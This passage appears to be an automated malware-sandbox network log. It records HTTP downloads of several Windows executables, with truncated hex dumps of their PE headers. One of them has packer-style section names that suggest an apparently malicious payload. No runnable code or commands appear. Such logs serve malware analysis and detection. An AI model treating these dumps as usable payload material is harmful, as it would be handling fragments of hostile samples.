00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6f 73 78 67 75 7a 6e 6e 00 60 2a 00 00 a0 00 00 00 50 2a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6b 73 63 6b 62 66 75 00 20 00 00 00 00 2b 00 00 04 00 00 00 b8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2b 00 00 22 00 00 00 bc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 22 Dec 2024 01:18:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 22 Dec 2024 01:18:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 22 Dec 2024 01:18:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 22 Dec 2024 01:18:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 22 Dec 2024 01:18:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:18:42 GMTContent-Type: application/octet-streamContent-Length: 2809344Last-Modified: Sun, 22 Dec 2024 00:17:01 GMTConnection: keep-aliveETag: "67675a7d-2ade00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 d9 47 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6f 73 78 67 75 7a 6e 6e 00 60 2a 00 00 a0 00 00 00 50 2a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6b 73 63 6b 62 66 75 00 20 00 00 00 00 2b 00 00 04 00 00 00 b8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2b 00 00 22 00 00 00 bc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 22 Dec 2024 01:18:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 